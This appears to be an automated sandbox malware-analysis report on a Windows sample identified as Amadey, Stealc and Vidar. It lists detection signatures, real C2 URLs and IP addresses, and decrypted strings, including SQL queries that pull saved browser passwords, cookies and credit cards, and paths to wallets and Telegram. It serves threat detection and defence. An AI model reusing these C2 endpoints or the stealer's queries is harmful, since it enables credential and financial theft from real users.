Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1570634
MD5:	df2148240759f523a1f6222d9dde9593
SHA1:	909ac448b4c693897ad338a1584cd6b9e9bfecb8
SHA256:	c345aac946f217493e26b70406e93e028985d34c0575b087f208f3dd9c48075d
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the document folder of the user

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Monitors registry run keys for changes

PE file contains section with special chars

Potentially malicious time measurement code found

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file overlay found

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/softokn3.dll:oH	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllct	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php003	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpUE	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpt8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpc60ab594776c83eaa9bd06ecc7f8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllCu	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpL8	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dll)o	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllX	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php.L	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllOt	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dll-u	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllwo	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000000.00000002.1979370069.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: 00000012.00000002.2062939332.00000000005B1000.00000040.00000001.01000000.0000000E.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1012962001\931e3b56d4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\JDGIECGIEB.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.610000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 07
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 01
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.610000.0.unpack	String decryptor: 25
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.610000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.610000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.610000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.610000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.610000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.610000.0.unpack	String decryptor: /c4becf79229cb002.php
Source: 0.2.file.exe.610000.0.unpack	String decryptor: /68b591d6548ec281/
Source: 0.2.file.exe.610000.0.unpack	String decryptor: drum
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.610000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.610000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.610000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.610000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.610000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.610000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.610000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.610000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.610000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.610000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.610000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.610000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.610000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.610000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.610000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.610000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.610000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.610000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.610000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.610000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.610000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.610000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.610000.0.unpack	String decryptor: history
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.610000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.610000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.610000.0.unpack	String decryptor: History
Source: 0.2.file.exe.610000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.610000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.610000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.610000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.610000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.610000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.610000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.610000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.610000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.610000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.610000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.610000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.610000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.610000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.610000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.610000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.610000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.610000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.610000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.610000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.610000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.610000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.610000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.610000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.610000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.610000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.610000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.610000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.610000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.610000.0.unpack	String decryptor: open
Source: 0.2.file.exe.610000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.610000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.610000.0.unpack	String decryptor: files
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.610000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.610000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.610000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.610000.0.unpack	String decryptor: Tox
